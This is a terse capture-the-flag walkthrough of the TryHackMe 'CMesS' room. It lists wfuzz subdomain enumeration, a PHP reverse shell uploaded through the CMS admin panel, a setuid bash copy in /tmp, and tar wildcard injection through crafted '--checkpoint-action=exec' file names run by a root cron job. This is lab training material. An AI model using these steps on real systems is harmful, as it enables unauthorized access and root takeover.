CMesS

https://tryhackme.com/room/cmess

Add ipi cmess.th to /etc/hosts

Open Ports:

• 22- SSH
• 80- HTTP

Gaining Access:

Port 80-

1. Do wfuzz for subdomain enum

   wfuzz -c -f sub-fighter -w /usr/share/wfuzz/wordlist/top5000 -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm"
   

   To sort the output

   wfuzz -c -f sub-fighter -w /usr/share/wfuzz/wordlist/top5000 -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290
   

   

2. Add ip dev.cmess.thm to /etc/hots
   a. Find email
   b. Password
3. Do dirb
   a. Found ip/admin page
4. login
   a. Go to content / file / upload
   b. upload
5. go to ip/assests/php-rev
6. Upload linEum.sh
   a. Found /opt/password.bak
   

User Flag:

Priviledge Escalation

cat /etc/crontab

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/andru/shell.sh
Chmod +x  shell.sh

Tar specific commands:

• Touch /home/user/–checkpoint=1
• Touch /home/user/–checkpoint-action=exec=sh\shell.sh wait for min
• /tmp/bash -p

ROOT Flag: